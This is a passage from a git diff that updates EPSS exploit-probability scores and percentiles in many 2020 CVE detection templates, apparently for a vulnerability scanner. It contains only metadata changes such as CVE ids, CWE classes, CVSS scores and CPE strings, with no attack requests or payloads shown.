b/http/cves/2020/CVE-2020-26214.yaml index 305ccadb0c..500a163c51 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26214 cwe-id: CWE-287 epss-score: 0.01258 - epss-percentile: 0.83887 + epss-percentile: 0.8405 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index 671cbbad19..5ef9eb953c 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97456 - epss-percentile: 0.99927 + epss-percentile: 0.9994 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 13d1f4a1dc..cafb94cc3e 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26248 cwe-id: CWE-89 epss-score: 0.01502 - epss-percentile: 0.85288 + epss-percentile: 0.85441 cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 5766b58c63..e30940635b 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26258 cwe-id: CWE-918 epss-score: 0.93377 - epss-percentile: 0.98715 + epss-percentile: 0.98786 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index 5534237a40..b860950b25 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-26413 cwe-id: CWE-200 epss-score: 0.65771 - epss-percentile: 0.97457 + epss-percentile: 0.97523 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index 4218a0950b..ff85a0f6db 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26876 cwe-id: CWE-306 epss-score: 0.01156 - epss-percentile: 0.83081 + epss-percentile: 0.83281 cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 4f3b5dedfe..bd22620cf4 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26919 - epss-score: 0.97414 - epss-percentile: 0.99885 + epss-score: 0.97424 + epss-percentile: 0.99913 cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index 3e578ed1f5..2bf9156db1 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-26948 cwe-id: CWE-918 - epss-score: 0.06357 - epss-percentile: 0.92728 + epss-score: 0.13986 + epss-percentile: 0.95032 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index dbd1cbd74d..4363d608ec 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27191 cwe-id: CWE-22 - epss-score: 0.00698 - epss-percentile: 0.77767 + epss-score: 0.00787 + epss-percentile: 0.79467 cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index f618a76212..4b41b8bd4e 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 - epss-score: 0.26869 - epss-percentile: 0.96147 + epss-score: 0.2895 + epss-percentile: 0.96319 cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index f430029a07..15782e53cc 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2020-27361 cwe-id: CWE-668 epss-score: 0.02936 - epss-percentile: 0.89526 + epss-percentile: 0.89678 cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 8ba6a6a615..ec0efa5bad 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 - epss-score: 0.00459 - epss-percentile: 0.72208 + epss-score: 0.00845 + epss-percentile: 0.80232 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index f540af8a61..cc4a9d9a82 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-27481 cwe-id: CWE-89 - epss-score: 0.12044 - epss-percentile: 0.94623 + epss-score: 0.09369 + epss-percentile: 0.94025 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 1d2608f5e5..5d255b5142 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27735 cwe-id: CWE-79 - epss-score: 0.00217 - epss-percentile: 0.59 + epss-score: 0.00216 + epss-percentile: 0.59303 cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 19945a3ecb..46854e9e16 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-27866 cwe-id: CWE-288,CWE-287 - epss-score: 0.00365 - epss-percentile: 0.68896 + epss-score: 0.00433 + epss-percentile: 0.71697 cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 2fad5d25bc..00586ec19b 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-27982 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54259 + epss-percentile: 0.54685 cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 691ed5020c..8287b7c1ee 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-27986 cwe-id: CWE-306 epss-score: 0.1352 - epss-percentile: 0.94881 + epss-percentile: 0.94958 cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index ad4224d2a8..e4c398d589 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-28185 - epss-score: 0.00406 - epss-percentile: 0.70469 + epss-score: 0.00454 + epss-percentile: 0.72373 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 951c27fab6..d2920120f8 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 - epss-score: 0.97282 - epss-percentile: 0.99781 + epss-score: 0.9724 + epss-percentile: 0.99777 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 6ca985d591..2e3eca4029 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-28208 cwe-id: CWE-203 epss-score: 0.00847 - epss-percentile: 0.80027 + epss-percentile: 0.80247 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index abdd5d1088..49ad63ddc2 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-28351 cwe-id: CWE-79 epss-score: 0.0036 - epss-percentile: 0.68696 + epss-percentile: 0.68998 cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index 67d8e84484..f7179c8295 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28871 cwe-id: CWE-434 - epss-score: 0.96633 - epss-percentile: 0.99468 + epss-score: 0.97005 + epss-percentile: 0.99649 cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 266da7d2ec..e6cf5ce7f7 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-28976 cwe-id: CWE-918 epss-score: 0.00616 - epss-percentile: 0.76102 + epss-percentile: 0.76361 cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 532de6ce7c..c0119831dc 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-29164 cwe-id: CWE-79 - epss-score: 0.00159 - epss-percentile: 0.51802 + epss-score: 0.00193 + epss-percentile: 0.56764 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 43a0012c99..6984bf2f8b 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-29227 - epss-score: 0.00834 - epss-percentile: 0.79881 + epss-score: 0.00556 + epss-percentile: 0.74996 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index 5b0002d0a8..5e901e0cad 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-29284 cwe-id: CWE-89 epss-score: 0.04855 - epss-percentile: 0.91729 + epss-percentile: 0.91843 cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 1ceb572bfa..2c73a40685 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-29395 cwe-id: CWE-79 epss-score: 0.05489 - epss-percentile: 0.92226 + epss-percentile: 0.9234 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index d1004e1132..1d386cb8f0 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-29453 cwe-id: CWE-22 - epss-score: 0.0129 - epss-percentile: 0.84109 + epss-score: 0.01279 + epss-percentile: 0.84183 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 593ec5ec0a..ba553cb592 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29583 cwe-id: CWE-522 - epss-score: 0.95089 - epss-percentile: 0.99017 + epss-score: 0.95661 + epss-percentile: 0.99199 cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index e5c059ff37..4deb3a51c2 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 - epss-score: 0.83723 - epss-percentile: 0.98014 + epss-score: 0.81807 + epss-percentile: 0.97986 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index a98064e04a..d9cb8c39c6 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2020-3187 cwe-id: CWE-22 - epss-score: 0.97377 - epss-percentile: 0.9986 + epss-score: 0.97277 + epss-percentile: 0.99803 cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index d4ee715e7e..98deb41830 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-3452 cwe-id: CWE-22,CWE-20 - epss-score: 0.97534 - epss-percentile: 0.99987 + epss-score: 0.97545 + epss-percentile: 0.99992 cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 5a9c40133f..170f1c7a01 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 - epss-score: 0.39621 - epss-percentile: 0.9676 + epss-score: 0.38965 + epss-percentile: 0.96784 cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 09b989aa2e..eba5e4e316 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35338 cwe-id: CWE-798 - epss-score: 0.05169 - epss-percentile: 0.91985 + epss-score: 0.09782 + epss-percentile: 0.94161 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 43f3323a34..63dafa17a5 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35476 cwe-id: CWE-78 - epss-score: 0.96323 - epss-percentile: 0.99341 + epss-score: 0.96079 + epss-percentile: 0.99303 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 74c48913ac..df6f1b392d 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2020-35489 cwe-id: CWE-434 - epss-score: 0.92577 - epss-percentile: 0.98617 + epss-score: 0.91898 + epss-percentile: 0.98597 cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index d675bb2392..bdb7dacb8a 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35580 cwe-id: CWE-22 - epss-score: 0.02411 - epss-percentile: 0.88535 + epss-score: 0.02597 + epss-percentile: 0.89069 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 6148104d45..91fa366ee9 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - epss-score: 0.10794 - epss-percentile: 0.94342 + epss-score: 0.10681 + epss-percentile: 0.94404 cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 281c0ede28..305f6e636e 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35713 cwe-id: CWE-78 - epss-score: 0.9717 - epss-percentile: 0.99711 + epss-score: 0.9714 + epss-percentile: 0.99718 cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 4c7692fa84..3653292fcf 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - epss-score: 0.95277 - epss-percentile: 0.99064 + epss-score: 0.95605 + epss-percentile: 0.99189 cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 6135c7e3d6..0636b20c6a 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35736 cwe-id: CWE-22 - epss-score: 0.01465 - epss-percentile: 0.85077 + epss-score: 0.01291 + epss-percentile: 0.8429 cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index f16b69a0b8..70899864c9 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - epss-score: 0.01796 - epss-percentile: 0.86587 + epss-score: 0.017 + epss-percentile: 0.86306 cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 77e7cc94f6..35a3987ee5 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35774 cwe-id: CWE-79 epss-score: 0.97219 - epss-percentile: 0.99744 + epss-percentile: 0.99764 cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 682ebe4c57..5a73106a56 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-3580 cwe-id: CWE-79 - epss-score: 0.97233 - epss-percentile: 0.99751 + epss-score: 0.97147 + epss-percentile: 0.99722 cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index c3c86b412b..0be9437648 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 - epss-score: 0.80821 - epss-percentile: 0.97904 + epss-score: 0.84526 + epss-percentile: 0.98111 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index a39283715a..ce4ad43456 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 - epss-score: 0.76547 - epss-percentile: 0.97778 + epss-score: 0.74725 + epss-percentile: 0.97773 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index fa769366de..cf07cd6dff 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 - epss-score: 0.75494 - epss-percentile: 0.97747 + epss-score: 0.74515 + epss-percentile: 0.97768 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index bfa76ac8f1..a672d85f1a 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 - epss-score: 0.00158 - epss-percentile: 0.51651 + epss-score: 0.00174 + epss-percentile: 0.54309 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 50a2e77bf2..016775e2fb 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35984 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46587 + epss-percentile: 0.46918 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index 2ece3d397d..35f2e57131 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46587 + epss-percentile: 0.46918 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index fdb7b46403..b501a9a118 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46587 + epss-percentile: 0.46918 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 0841c06c90..5f4f1f93ee 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35987 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.46587 + epss-percentile: 0.46918 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index f4b0146590..86bdaeaf40 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - epss-score: 0.48049 - epss-percentile: 0.97007 + epss-score: 0.4379 + epss-percentile: 0.96945 cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index 38f5c0c88c..450a7a5afb 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-36289 cwe-id: CWE-863 - epss-score: 0.97071 - epss-percentile: 0.99658 + epss-score: 0.92682 + epss-percentile: 0.98694 cpe: 